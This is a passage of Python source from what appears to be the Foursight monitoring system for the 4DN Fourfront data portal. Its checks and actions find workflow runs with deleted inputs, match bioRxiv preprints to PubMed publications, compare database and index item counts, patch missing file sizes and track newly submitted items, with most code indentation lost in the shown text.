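# reported as inconsistent when their spread is at least 25% of their mean; smaller differences
# between replicates are tolerated.
def _sketch_fragment_sizes_inconsistent(sizes):
    """Return True if integer fragment sizes differ by 25% or more of their mean."""
    sizes = [int(s) for s in sizes]
    return (max(sizes) - min(sizes)) / (sum(sizes) / len(sizes)) >= 0.25
# e.g. _sketch_fragment_sizes_inconsistent(['400', '420']) -> False (tolerated)
#      _sketch_fragment_sizes_inconsistent(['300', '500']) -> True (reported)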
@action_function()
def patch_badges_for_inconsistent_replicate_info(connection, **kwargs):
action = ActionResult(connection, 'patch_badges_for_inconsistent_replicate_info')
rep_info_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
rep_info_check_result['full_output'], 'inconsistent-replicate-info', connection.ff_keys
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching successful for inconsistent replicate info badges.'
return action
```
#### File: chalicelib/checks/wrangler_checks.py
```python
from dcicutils import ff_utils
from dcicutils.env_utils import prod_bucket_env_for_app
import re
import requests
import json
import datetime
import time
import itertools
import random
from difflib import SequenceMatcher
import boto3
from .helpers import wrangler_utils
from collections import Counter
from oauth2client.service_account import ServiceAccountCredentials
import gspread
import pandas as pd
from collections import OrderedDict
import uuid
# Use confchecks to import decorators object and its methods for each check module
# rather than importing check_function, action_function, CheckResult, ActionResult
# individually - they're now part of class Decorators in foursight-core::decorators
# that requires initialization with foursight prefix.
from .helpers.confchecks import *
# use a random number to stagger checks
random_wait = 20
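# Each check below sleeps for round(random.uniform(0.1, random_wait), 1) seconds (0.1-20s)
# before querying, so checks scheduled at the same time do not all hit the portal at once.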
@check_function(cmp_to_last=False)
def workflow_run_has_deleted_input_file(connection, **kwargs):
"""Checks all wfrs that are not deleted, and have deleted input files
There is an option to compare to the last run and only report new cases (cmp_to_last)
The full output has 2 keys, because we report provenance wfrs but do not run the action on them
problematic_provenance: stores uuid of deleted file, and the wfr that is not deleted
problematic_wfr: stores deleted file, wfr to be deleted, and its downstream items (qcs and output files)
"""
check = CheckResult(connection, 'workflow_run_has_deleted_input_file')
check.status = "PASS"
check.action = "patch_workflow_run_to_deleted"
my_key = connection.ff_keys
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# run the check
search_query = 'search/?type=WorkflowRun&status!=deleted&input_files.value.status=deleted&limit=all'
bad_wfrs = ff_utils.search_metadata(search_query, key=my_key)
if kwargs.get('cmp_to_last', False):
# filter out wfr uuids from last run if so desired
prevchk = check.get_latest_result()
if prevchk:
prev_wfrs = prevchk.get('full_output', [])
filtered = [b.get('uuid') for b in bad_wfrs if b.get('uuid') not in prev_wfrs]
bad_wfrs = filtered
if not bad_wfrs:
check.summary = check.description = "No live WorkflowRuns linked to deleted input Files"
return check
brief = str(len(bad_wfrs)) + " live WorkflowRuns linked to deleted input Files"
# problematic_provenance stores uuid of deleted file, and the wfr that is not deleted
# problematic_wfr stores deleted file, wfr to be deleted, and its downstream items (qcs and output files)
fulloutput = {'problematic_provenance': [], 'problematic_wfrs': []}
no_of_items_to_delete = 0
def fetch_wfr_associated(wfr_info):
"""Given wfr_uuid, find associated output files and qcs"""
wfr_as_list = []
wfr_as_list.append(wfr_info['uuid'])
if wfr_info.get('output_files'):
for o in wfr_info['output_files']:
if o.get('value'):
wfr_as_list.append(o['value']['uuid'])
if o.get('value_qc'):
wfr_as_list.append(o['value_qc']['uuid'])
if wfr_info.get('output_quality_metrics'):
for qc in wfr_info['output_quality_metrics']:
if qc.get('value'):
wfr_as_list.append(qc['value']['uuid'])
return list(set(wfr_as_list))
for wfr in bad_wfrs:
infiles = wfr.get('input_files', [])
delfile = [f.get('value').get('uuid') for f in infiles if f.get('value').get('status') == 'deleted'][0]
if wfr['display_title'].startswith('File Provenance Tracking'):
fulloutput['problematic_provenance'].append([delfile, wfr['uuid']])
else:
del_list = fetch_wfr_associated(wfr)
fulloutput['problematic_wfrs'].append([delfile, wfr['uuid'], del_list])
no_of_items_to_delete += len(del_list)
check.summary = "Live WorkflowRuns found linked to deleted Input Files"
check.description = "{} live workflows were found linked to deleted input files - \
found {} items to delete, use action for cleanup".format(len(bad_wfrs), no_of_items_to_delete)
if fulloutput.get('problematic_provenance'):
brief += " ({} provenance tracking)"
check.brief_output = brief
check.full_output = fulloutput
check.status = 'WARN'
check.action_message = "Will attempt to patch %s workflow_runs with deleted inputs to status=deleted." % str(len(bad_wfrs))
check.allow_action = True # allows the action to be run
return check
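# For reference (derived from the check above): each full_output['problematic_wfrs'] entry is
# [deleted_input_file_uuid, wfr_uuid, [wfr_uuid plus its output file and qc uuids]]; the action
# below patches every uuid in that third element to status=deleted.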
@action_function()
def patch_workflow_run_to_deleted(connection, **kwargs):
action = ActionResult(connection, 'patch_workflow_run_to_deleted')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_failure': [], 'patch_success': []}
my_key = connection.ff_keys
for a_case in check_res['full_output']['problematic_wfrs']:
wfruid = a_case[1]
del_list = a_case[2]
patch_data = {'status': 'deleted'}
for delete_me in del_list:
try:
ff_utils.patch_metadata(patch_data, obj_id=delete_me, key=my_key)
except Exception as e:
acc_and_error = [delete_me, str(e)]
action_logs['patch_failure'].append(acc_and_error)
else:
action_logs['patch_success'].append(wfruid + " - " + delete_me)
action.output = action_logs
action.status = 'DONE'
if action_logs.get('patch_failure'):
action.status = 'FAIL'
return action
# helper functions for biorxiv check
def get_biorxiv_meta(biorxiv_id, connection):
''' Attempts to get metadata for provided biorxiv id
returns an error string if the request fails
'''
try:
biorxiv = ff_utils.get_metadata(biorxiv_id, key=connection.ff_keys, add_on='frame=object')
except Exception as e:
return 'Problem getting biorxiv - msg: ' + str(e)
else:
if not biorxiv:
return 'Biorxiv not found!'
return biorxiv
def get_transfer_fields(biorxiv_meta):
fields2transfer = [
'lab', 'contributing_labs', 'award', 'categories', 'exp_sets_prod_in_pub',
'exp_sets_used_in_pub', 'published_by', 'static_headers',
'static_content'
]
return {f: biorxiv_meta.get(f) for f in fields2transfer if biorxiv_meta.get(f) is not None}
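# e.g. (illustrative values) get_transfer_fields({'lab': '/labs/some-lab/', 'award': None,
# 'categories': ['basic biology']}) -> {'lab': '/labs/some-lab/', 'categories': ['basic biology']}
# - only the whitelisted fields actually set on the biorxiv record are carried over to the new pub.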
@check_function(uuid_list=None, false_positives=None, add_to_result=None)
def biorxiv_is_now_published(connection, **kwargs):
''' To restrict the check to just certain biorxivs use a comma separated list
of biorxiv uuids in uuid_list kwarg. This is useful if you want to
only perform the replacement on a subset of the potential matches - i.e.
re-run the check with a uuid list and then perform the actions on the result
of the restricted check.
Known cases of incorrect associations are stored in the check result in
the 'false_positives' field of full_output. To add new entries to this field use the
'false_positives' kwarg with format "rxiv_uuid1: number_part_only_of_PMID, rxiv_uuid2: ID ..."
e.g. fd3827e5-bc4c-4c03-bf22-919ee8f4351f:31010829, and to reset to empty use 'RESET'
There are some examples of the title and author list being different enough so
that the pubmed esearch query doesn't find the journal article. In order to
allow the replacement, the transfer of all the relevant fields and the addition of replacement
static sections in the action, a parameter is provided to manually input a mapping between
biorxiv (uuid) and journal article (PMID:ID) - this adds that pairing to the result full_output.
It will be acted on by the associated action; the input format is "uuid PMID:nnnnnn, uuid PMID:nnnnnn"
NOTE: because the data to transfer from biorxiv to pub is obtained from the check result
it is important to run the check (again) before executing the action in case something has
changed since the check was run
'''
check = CheckResult(connection, 'biorxiv_is_now_published')
chkstatus = ''
chkdesc = ''
check.action = "add_pub_and_replace_biorxiv"
fulloutput = {'biorxivs2check': {}, 'false_positives': {}, 'GEO datasets found': {}}
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# see if a 'manual' mapping was provided as a parameter
fndcnt = 0
if kwargs.get('add_to_result'):
b2p = [pair.strip().split(' ') for pair in kwargs.get('add_to_result').split(',')]
b2p = {b.strip(): p.strip() for b, p in b2p}
# if there was a manual mapping need to report info to transfer
for bid, pid in b2p.items():
b_meta = get_biorxiv_meta(bid, connection)
if isinstance(b_meta, str):
check.status = "FAIL"
check.description = "Problem retrieving metadata for input data - " + b_meta
return check
fulloutput['biorxivs2check'].setdefault(bid, {}).update({'new_pub_ids': [pid]})
if b_meta.get('url'):
fulloutput['biorxivs2check'][bid].setdefault('blink', b_meta.get('url'))
fulloutput['biorxivs2check'][bid].setdefault('data2transfer', {}).update(get_transfer_fields(b_meta))
fndcnt = len(b2p)
search = 'search/?'
if kwargs.get('uuid_list'):
suffix = '&'.join(['uuid={}'.format(u) for u in [uid.strip() for uid in kwargs.get('uuid_list').split(',')]])
else:
suffix = 'journal=bioRxiv&type=Publication&status=current&limit=all'
# run the check
search_query = search + suffix
biorxivs = ff_utils.search_metadata(search_query, key=connection.ff_keys)
if not biorxivs and not fndcnt:
check.status = "FAIL"
check.description = "Could not retrieve biorxiv records from fourfront"
return check
# here is where we get any previous or current false positives
last_result = check.get_primary_result()
# if last one was fail, find an earlier check with non-FAIL status
it = 0
while last_result['status'] == 'ERROR' or not last_result['kwargs'].get('primary'):
it += 1
# this is a daily check, so look for checks with 12h iteration
hours = it * 12
last_result = check.get_closest_result(diff_hours=hours)
# if this is going forever kill it
if hours > 100:
err_msg = 'Can not find a non-FAIL check in last 100 hours'
check.brief_output = err_msg
check.full_output = {}
check.status = 'ERROR'
return check
last_result = last_result.get('full_output')
try:
false_pos = last_result.get('false_positives', {})
except AttributeError: # if check errored last result is a list of error rather than a dict
false_pos = {}
fp_input = kwargs.get('false_positives')
if fp_input:
fps = [fp.strip() for fp in fp_input.split(',')]
for fp in fps:
if fp == 'RESET': # reset the saved dict to empty
false_pos = {}
continue
id_vals = [i.strip() for i in fp.split(':')]
false_pos.setdefault(id_vals[0], []).append(id_vals[1])
fulloutput['false_positives'] = false_pos
pubmed_url = 'https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&retmode=json'
problems = {}
for bx in biorxivs:
title = bx.get('title')
authors = bx.get('authors')
buuid = bx.get('uuid')
if not (title and authors):
# problem with biorxiv record in ff
problems.setdefault('missing metadata', []).append(buuid)
if not chkstatus or chkstatus != 'WARN':
chkstatus = 'WARN'
msg = "some biorxiv records are missing metadata used for search\n"
if msg not in chkdesc:
chkdesc = chkdesc + msg
# first search with title
suffix = '&field=title&term={}'.format(title)
title_query = pubmed_url + suffix
time.sleep(1)
do_author_search = False
ids = []
res = requests.get(title_query)
if res.status_code == 200:
result = res.json().get('esearchresult')
if not result or not result.get('idlist'):
do_author_search = True
else:
ids = result.get('idlist')
else:
do_author_search = True # problem with request to pubmed
if do_author_search and authors:
author_string = '&term=' + '%20'.join(['{}[Author]'.format(a.split(' ')[-1]) for a in authors])
author_query = pubmed_url + author_string
time.sleep(1)
res = requests.get(author_query)
if res.status_code == 200:
result = res.json().get('esearchresult')
if result and result.get('idlist'):
ids = result.get('idlist')
if buuid in false_pos:
ids = [i for i in ids if i not in false_pos[buuid]]
if ids:
# we have possible article(s) - populate check_result
fndcnt += 1
fulloutput['biorxivs2check'].setdefault(buuid, {}).update({'new_pub_ids': ['PMID:' + id for id in ids]})
if bx.get('url'):
fulloutput['biorxivs2check'][buuid].setdefault('blink', bx.get('url'))
# here we don't want the embedded search view so get frame=object
bmeta = get_biorxiv_meta(buuid, connection)
fulloutput['biorxivs2check'][buuid].setdefault('data2transfer', {}).update(get_transfer_fields(bmeta))
# look for GEO datasets
for id_ in ids:
result = requests.get('https://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
'elink.fcgi?dbfrom=pubmed&db=gds&id={}&retmode=json'.format(id_))
if result.status_code != 200:
continue
geo_ids = [num for link in json.loads(result.text).get('linksets', [])
for item in link.get('linksetdbs', []) for num in item.get('links', [])]
geo_accs = []
for geo_id in geo_ids:
geo_result = requests.get('https://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
'efetch.fcgi?db=gds&id={}'.format(geo_id))
if geo_result.status_code == 200:
geo_accs.extend([item for item in geo_result.text.split() if item.startswith('GSE')])
if geo_accs:
fulloutput['GEO datasets found']['PMID:' + id_] = geo_accs
if fndcnt != 0:
chkdesc = "Candidate Biorxivs to replace found\nNOTE: please re-run check directly prior to running action to ensure all metadata is up to date." + chkdesc
if not chkstatus:
chkstatus = 'WARN'
check.allow_action = True
else:
chkdesc = "No Biorxivs to replace\n" + chkdesc
if not chkstatus:
chkstatus = 'PASS'
check.allow_action = False
check.status = chkstatus
check.summary = check.description = chkdesc
check.brief_output = fndcnt
check.full_output = fulloutput
return check
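# Illustrative sketch (not part of the original check): the string formats described in the
# docstring above, assuming well-formed input. 'add_to_result' entries are
# '<biorxiv_uuid> PMID:nnnnnn' pairs separated by commas; 'false_positives' entries are
# '<biorxiv_uuid>:<pmid_number>' pairs separated by commas (or the literal 'RESET').
def _sketch_parse_biorxiv_kwargs(add_to_result, false_positives):
    """Parse the two kwarg strings into dicts, mirroring the parsing done in the check."""
    b2p = dict(pair.strip().split(' ') for pair in add_to_result.split(',')) if add_to_result else {}
    false_pos = {}
    for fp in (false_positives or '').split(','):
        fp = fp.strip()
        if not fp or fp == 'RESET':
            continue
        buuid, pmid = [i.strip() for i in fp.split(':')]
        false_pos.setdefault(buuid, []).append(pmid)
    return b2p, false_pos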
@action_function()
def add_pub_and_replace_biorxiv(connection, **kwargs):
action = ActionResult(connection, 'add_pub_and_replace_biorxiv')
action_log = {}
biorxiv_check_result = action.get_associated_check_result(kwargs)
check_output = biorxiv_check_result.get('full_output', {})
to_replace = check_output.get('biorxivs2check', {})
for buuid, transfer_info in to_replace.items():
error = ''
pmids = transfer_info.get('new_pub_ids', [])
if len(pmids) != 1:
pmstr = ', '.join(pmids)
action_log[buuid] = '0 or multiple pmids {} - manual intervention needed!\n\tNOTE: to transfer to a single pub you can enter the biorxiv uuid PMID in add_to_result'.format(pmstr)
continue
pmid = pmids[0]
# prepare a post/patch for transferring data
existing_fields = {}
fields_to_patch = {}
post_metadata = transfer_info.get('data2transfer', {})
post_metadata['ID'] = pmid
post_metadata['status'] = 'current'
if 'blink' in transfer_info:
post_metadata['aka'] = transfer_info.get('blink')
# first try to post the pub
pub_upd_res = None
pub = None
try:
pub_upd_res = ff_utils.post_metadata(post_metadata, 'publication', key=connection.ff_keys)
except Exception as e:
error = str(e)
else:
if pub_upd_res.get('status') != 'success':
error = pub_upd_res.get('status')
if error:
if "'code': 422" in error:
# there is a conflict-see if pub is already in portal
pub_search_res = None
error = '' # reset error
try:
search = 'search/?type=Publication&ID={}&frame=object'.format(post_metadata['ID'])
pub_search_res = ff_utils.search_metadata(search, key=connection.ff_keys)
except Exception as e:
error = 'SEARCH failure for {} - msg: {}'.format(pmid, str(e))
else:
if not pub_search_res or len(pub_search_res) != 1:
error = 'SEARCH for {} returned zero or multiple results'.format(pmid)
if error:
action_log[buuid] = error
continue
# a single pub with that pmid is found - try to patch it
pub = pub_search_res[0]
for f, v in post_metadata.items():
if pub.get(f):
if f == 'status' and pub.get(f) != v:
fields_to_patch[f] = v
if f != 'ID':
existing_fields[f] = pub.get(f)
else:
fields_to_patch[f] = v
if fields_to_patch:
try:
puuid = pub.get('uuid')
pub_upd_res = ff_utils.patch_metadata(fields_to_patch, puuid, key=connection.ff_keys)
except Exception as e:
error = 'PATCH failure for {} msg: {}'.format(pmid, str(e))
else:
if pub_upd_res.get('status') != 'success':
error = 'PATCH failure for {} msg: {}'.format(pmid, pub_upd_res.get('status'))
if error:
action_log[buuid] = error
continue
else: # all the fields already exist on the item
msg = 'NOTHING TO AUTO PATCH - {} already has all the fields in the biorxiv - WARNING values may be different!'.format(pmid)
action_log[buuid] = {
'message': msg,
'existing': existing_fields,
'possibly_new': post_metadata
}
else:
error = 'POST failure for {} msg: {}'.format(pmid, error)
action_log[buuid] = error
continue
else:
pub = pub_upd_res['@graph'][0]
# here we have successfully posted or patched a pub
# generate a static header with link to new pub and set status of biorxiv to replaced
if not pub:
action_log[buuid] = 'NEW PUB INFO NOT AVAILABLE'
continue
header_alias = "static_header:replaced_biorxiv_{}_by_{}".format(buuid, pmid.replace(':', '_'))
header_name = "static-header.replaced_item_{}".format(buuid)
header_post = {
"body": "This biorxiv set was replaced by [{0}]({2}{1}/).".format(pmid, pub.get('uuid'), connection.ff_server),
"award": post_metadata.get('award'),
"lab": post_metadata.get('lab'),
"name": header_name,
"section_type": "Item Page Header",
"options": {"title_icon": "info", "default_open": True, "filetype": "md", "collapsible": False},
"title": "Note: Replaced Biorxiv",
"status": 'released',
"aliases": [header_alias]
}
huuid = None
try_search = False
try:
header_res = ff_utils.post_metadata(header_post, 'static_section', key=connection.ff_keys)
except Exception as e:
error = 'FAILED TO POST STATIC SECTION - msg: {}'.format(str(e))
try_search = True
else:
try:
huuid = header_res['@graph'][0].get('uuid')
except (KeyError, AttributeError) as e: # likely a conflict - search for existing section by name
try_search = True
if try_search:
try:
search = 'search/?type=UserContent&name={}&frame=object'.format(header_name)
header_search_res = ff_utils.search_metadata(search, key=connection.ff_keys)
except Exception as e:
error = 'SEARCH failure for {} - msg: {}'.format(header_name, str(e))
else:
if header_search_res and len(header_search_res) == 1:
huuid = header_search_res[0].get('uuid')
else:
error = 'PROBLEM WITH STATIC SECTION CREATION - manual intervention needed'
if error:
action_log[buuid] = error
patch_json = {'status': 'replaced'}
if huuid: # need to see if other static content exists and add this one
existing_content = post_metadata.get('static_content', [])
existing_content.append({'content': huuid, 'location': 'header'})
patch_json['static_content'] = existing_content
try:
replace_res = ff_utils.patch_metadata(patch_json, buuid, key=connection.ff_keys)
except Exception as e:
error = 'FAILED TO UPDATE STATUS FOR {} - msg: {}'.format(buuid, str(e))
else:
if replace_res.get('status') != 'success':
error = 'FAILED TO UPDATE STATUS FOR {} - msg: {}'.format(buuid, replace_res.get('status'))
# do we want to add a flag to indicate if it was post or patch
if existing_fields:
# report that it was an incomplete patch
msg = 'PARTIAL PATCH'
action_log[buuid] = {
'message': msg,
'existing': existing_fields,
'possibly_new': fields_to_patch,
'all_rxiv_data': post_metadata
}
else:
action_log[buuid] = {'message': 'DATA TRANSFERED TO ' + pmid}
if error:
action_log[buuid].update({'error': error})
action.status = 'DONE'
action.output = action_log
return action
@check_function()
def item_counts_by_type(connection, **kwargs):
def process_counts(count_str):
# specifically formatted for FF health page
ret = {}
split_str = count_str.split()
ret[split_str[0].strip(':')] = int(split_str[1])
ret[split_str[2].strip(':')] = int(split_str[3])
return ret
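# e.g. (assuming the health-page format 'DB: <n> ES: <m>')
# process_counts('DB: 74048 ES: 74012') -> {'DB': 74048, 'ES': 74012}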
check = CheckResult(connection, 'item_counts_by_type')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# run the check
item_counts = {}
warn_item_counts = {}
req_location = ''.join([connection.ff_server, 'counts?format=json'])
counts_res = ff_utils.authorized_request(req_location, auth=connection.ff_keys)
if counts_res.status_code >= 400:
check.status = 'ERROR'
check.description = 'Error (bad status code %s) connecting to the counts endpoint at: %s.' % (counts_res.status_code, req_location)
return check
counts_json = json.loads(counts_res.text)
for index in counts_json['db_es_compare']:
counts = process_counts(counts_json['db_es_compare'][index])
item_counts[index] = counts
if counts['DB'] != counts['ES']:
warn_item_counts[index] = counts
# add ALL for total counts
total_counts = process_counts(counts_json['db_es_total'])
item_counts['ALL'] = total_counts
# set fields, store result
if not item_counts:
check.status = 'FAIL'
check.summary = check.description = 'Error on fourfront health page'
elif warn_item_counts:
check.status = 'WARN'
check.summary = check.description = 'DB and ES item counts are not equal'
check.brief_output = warn_item_counts
else:
check.status = 'PASS'
check.summary = check.description = 'DB and ES item counts are equal'
check.full_output = item_counts
return check
@check_function()
def change_in_item_counts(connection, **kwargs):
# use this check to get the comparison
# import pdb; pdb.set_trace()
check = CheckResult(connection, 'change_in_item_counts')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
counts_check = CheckResult(connection, 'item_counts_by_type')
latest_check = counts_check.get_primary_result()
# get_item_counts run closest to 10 mins
prior_check = counts_check.get_closest_result(diff_hours=24)
if not latest_check.get('full_output') or not prior_check.get('full_output'):
check.status = 'ERROR'
check.description = 'There are no counts_check results to run this check with.'
return check
diff_counts = {}
# drill into full_output
latest = latest_check['full_output']
prior = prior_check['full_output']
# get any keys that are in prior but not latest
prior_unique = list(set(prior.keys()) - set(latest.keys()))
for index in latest:
if index == 'ALL':
continue
if index not in prior:
diff_counts[index] = {'DB': latest[index]['DB'], 'ES': 0}
else:
diff_DB = latest[index]['DB'] - prior[index]['DB']
if diff_DB != 0:
diff_counts[index] = {'DB': diff_DB, 'ES': 0}
for index in prior_unique:
diff_counts[index] = {'DB': -1 * prior[index]['DB'], 'ES': 0}
# now do a metadata search to make sure they match
# date_created endpoints for the FF search
# XXX: We should revisit if we really think this search is necessary. - will 3-26-2020
to_date = datetime.datetime.strptime(latest_check['uuid'], "%Y-%m-%dT%H:%M:%S.%f").strftime('%Y-%m-%d+%H:%M')
from_date = datetime.datetime.strptime(prior_check['uuid'], "%Y-%m-%dT%H:%M:%S.%f").strftime('%Y-%m-%d+%H:%M')
# tracking items and ontology terms must be explicitly searched for
search_query = ''.join(['search/?type=Item&type=OntologyTerm&type=TrackingItem',
'&frame=object&date_created.from=',
from_date, '&date_created.to=', to_date])
search_resp = ff_utils.search_metadata(search_query, key=connection.ff_keys)
# add deleted/replaced items
search_query += '&status=deleted&status=replaced'
search_resp.extend(ff_utils.search_metadata(search_query, key=connection.ff_keys))
for res in search_resp:
# Stick with given type name in CamelCase since this is now what we get on the counts page
_type = res['@type'][0]
_entry = diff_counts.get(_type)
if not _entry:
diff_counts[_type] = _entry = {'DB': 0, 'ES': 0}
if _type in diff_counts:
_entry['ES'] += 1
check.ff_link = ''.join([connection.ff_server, 'search/?type=Item&',
'type=OntologyTerm&type=TrackingItem&date_created.from=',
from_date, '&date_created.to=', to_date])
check.brief_output = diff_counts
# total created items from diff counts (exclude any negative counts)
total_counts_db = sum([diff_counts[coll]['DB'] for coll in diff_counts if diff_counts[coll]['DB'] >= 0])
# see if we have negative counts
# allow negative counts, but make note of, for the following types
purged_types = ['TrackingItem', 'HiglassViewConfig', 'MicroscopeConfiguration']
bs_type = 'Biosample'
negative_types = [tp for tp in diff_counts if (diff_counts[tp]['DB'] < 0 and tp not in purged_types)]
if bs_type in negative_types:
if diff_counts[bs_type]['DB'] == -1:
negative_types.remove(bs_type)
inconsistent_types = [tp for tp in diff_counts if (diff_counts[tp]['DB'] != diff_counts[tp]['ES'] and tp not in purged_types)]
if negative_types:
negative_str = ', '.join(negative_types)
check.status = 'FAIL'
check.summary = 'DB counts decreased in the past day for %s' % negative_str
check.description = ('Positive numbers represent an increase in counts. '
'Some DB counts have decreased!')
elif inconsistent_types:
check.status = 'WARN'
check.summary = 'Change in DB counts does not match search result for new items'
check.description = ('Positive numbers represent an increase in counts. '
'The change in counts does not match search result for new items.')
else:
check.status = 'PASS'
check.summary = 'There are %s new items in the past day' % total_counts_db
check.description = check.summary + '. Positive numbers represent an increase in counts.'
check.description += ' Excluded types: %s' % ', '.join(purged_types)
return check
@check_function(file_type=None, status=None, file_format=None, search_add_on=None)
def identify_files_without_filesize(connection, **kwargs):
check = CheckResult(connection, 'identify_files_without_filesize')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# must set this to be the function name of the action
check.action = "patch_file_size"
check.allow_action = True
default_filetype = 'File'
default_stati = 'released%20to%20project&status=released&status=uploaded&status=pre-release'
filetype = kwargs.get('file_type') or default_filetype
stati = 'status=' + (kwargs.get('status') or default_stati)
search_query = 'search/?type={}&{}&frame=object&file_size=No value'.format(filetype, stati)
ff = kwargs.get('file_format')
if ff is not None:
ff = '&file_format.file_format=' + ff
search_query += ff
addon = kwargs.get('search_add_on')
if addon is not None:
if not addon.startswith('&'):
addon = '&' + addon
search_query += addon
problem_files = []
file_hits = ff_utils.search_metadata(search_query, key=connection.ff_keys, page_limit=200)
if not file_hits:
check.allow_action = False
check.summary = 'All files have file size'
check.description = 'All files have file size'
check.status = 'PASS'
return check
for hit in file_hits:
hit_dict = {
'accession': hit.get('accession'),
'uuid': hit.get('uuid'),
'@type': hit.get('@type'),
'upload_key': hit.get('upload_key')
}
problem_files.append(hit_dict)
check.brief_output = '{} files with no file size'.format(len(problem_files))
check.full_output = problem_files
check.status = 'WARN'
check.summary = 'File metadata found without file_size'
status_str = 'pre-release/released/released to project/uploaded'
if kwargs.get('status'):
status_str = kwargs.get('status')
type_str = ''
if kwargs.get('file_type'):
type_str = kwargs.get('file_type') + ' '
ff_str = ''
if kwargs.get('file_format'):
ff_str = kwargs.get('file_format') + ' '
check.description = "{cnt} {type}{ff}files that are {st} don't have file_size.".format(
cnt=len(problem_files), type=type_str, st=status_str, ff=ff_str)
check.action_message = "Will attempt to patch file_size for %s files." % str(len(problem_files))
check.allow_action = True # allows the action to be run
return check
@action_function()
def patch_file_size(connection, **kwargs):
action = ActionResult(connection, 'patch_file_size')
action_logs = {'s3_file_not_found': [], 'patch_failure': [], 'patch_success': []}
# get the associated identify_files_without_filesize run result
filesize_check_result = action.get_associated_check_result(kwargs)
for hit in filesize_check_result.get('full_output', []):
bucket = connection.ff_s3.outfile_bucket if 'FileProcessed' in hit['@type'] else connection.ff_s3.raw_file_bucket
head_info = connection.ff_s3.does_key_exist(hit['upload_key'], bucket)
if not head_info:
action_logs['s3_file_not_found'].append(hit['accession'])
else:
patch_data = {'file_size': head_info['ContentLength']}
try:
ff_utils.patch_metadata(patch_data, obj_id=hit['uuid'], key=connection.ff_keys)
except Exception as e:
acc_and_error = '\n'.join([hit['accession'], str(e)])
action_logs['patch_failure'].append(acc_and_error)
else:
action_logs['patch_success'].append(hit['accession'])
action.status = 'DONE'
action.output = action_logs
return action
@check_function(reset=False)
def new_or_updated_items(connection, **kwargs):
''' Currently restricted to experiment sets and experiments
search query can be modified if desired
keeps a running total of the number of new/changed items since
the last time the counters were reset (by running with reset=True)
'''
class DictQuery(dict):
def get(self, path, default=None):
keys = path.split(".")
val = None
for key in keys:
if val:
if isinstance(val, list):
val = [v.get(key, default) if v else None for v in val]
else:
val = val.get(key, default)
else:
val = dict.get(self, key, default)
if not val:
break
return val
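# e.g. (illustrative) DictQuery({'lab': {'uuid': 'abc'}}).get('lab.uuid') -> 'abc';
# when an intermediate value is a list, the remaining path is applied to each element.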
seen = {}
dcic = {}
def get_non_dcic_user(user, seen, dcic):
dciclab = "4DN DCIC, HMS"
try:
user = user.get('uuid')
except AttributeError:
pass
if user in dcic:
return None
if user in seen and user not in dcic:
return seen.get(user)
user_item = ff_utils.get_metadata(user, key=connection.ff_keys)
seen[user] = user_item.get('display_title')
if user_item.get('lab').get('display_title') == dciclab:
dcic[user] = True
return None
return user_item.get('display_title')
check = CheckResult(connection, 'new_or_updated_items')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
rundate = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M')
last_result = check.get_latest_result()
if last_result is None or last_result.get('status') == 'ERROR' or kwargs.get('reset') is True:
# initial set up when run on each environment - should produce 0 counts
# maybe also use for reset?
check.brief_output = {'reset_date': rundate}
check.full_output = {'reset_date': rundate}
check.status = 'PASS'
check.summary = 'Counters reset to 0'
return check
days_since = 7
last_check_date = last_result.get('uuid')
last_reset_date = last_result.get('brief_output').get('reset_date')
check.brief_output = {'reset_date': last_reset_date}
check.full_output = {'reset_date': last_reset_date}
days_ago = (datetime.datetime.utcnow() - datetime.timedelta(days=days_since)).strftime('%Y-%m-%dT%H:%M')
label2date = {
'since last check': last_check_date,
'since last reset': last_reset_date,
'in the last %d days' % days_since: days_ago
}
earliest_date = min([last_check_date, last_reset_date, days_ago])
search = 'search/?status=in review by lab&type={type}'
brief_output = {}
full_output = {}
warn = False
# fields used for reporting
item_flds = ['accession', 'lab.uuid', 'lab.display_title', 'submitted_by.uuid',
'last_modified.modified_by.uuid']
# can add or remove item types here
types2chk = ['ExperimentSet', 'Experiment']
for itype in types2chk:
chk_query = search.format(type=itype)
item_results = ff_utils.search_metadata(chk_query, key=connection.ff_keys, page_limit=200)
for item in item_results:
submitter = None
modifier = None
created = item.get('date_created')
modified = None
if item.get('last_modified', None) is not None:
modified = item.get('last_modified').get('date_modified')
# check to see if modified and created are essentially the same and if so ignore modified
minute_created = ':'.join(created.split(':')[0:2])
minute_modified = ':'.join(modified.split(':')[0:2])
if minute_created == minute_modified:
modified = None
if created and created > earliest_date:
submitter = get_non_dcic_user(item.get('submitted_by'), seen, dcic)
if modified and modified > earliest_date:
modifier = get_non_dcic_user(item.get('last_modified').get('modified_by'), seen, dcic)
# now we're ready to see which bucket item goes into
if submitter or modifier:
# we've got an item newer or modified since earliest date
item_info = {fld: DictQuery(item).get(fld) for fld in item_flds}
labname = item_info.get('lab.display_title')
labuuid = item_info.get('lab.uuid')
if submitter:
brief_output.setdefault(submitter, {}).setdefault(labname, {}).setdefault(itype, {})
full_output.setdefault(submitter, {}).setdefault(labname, {}).setdefault(itype, {})
for label, date in label2date.items():
newlabel = 'New ' + label
brief_output[submitter][labname][itype].setdefault(newlabel, 0)
full_output[submitter][labname][itype].setdefault(newlabel, 'None')
if created > date:
warn = True
# newlabel = 'New ' + label
# brief_output[submitter][labname][itype].setdefault(newlabel, 0)
brief_output[submitter][labname][itype][newlabel] += 1
# full_output[submitter][labname][itype].setdefault(newlabel, {'search': '', 'accessions': []})
if full_output[submitter][labname][itype][newlabel] == 'None' or not full_output[submitter][labname][itype][newlabel].get('search'):
searchdate, _ = date.split('T')
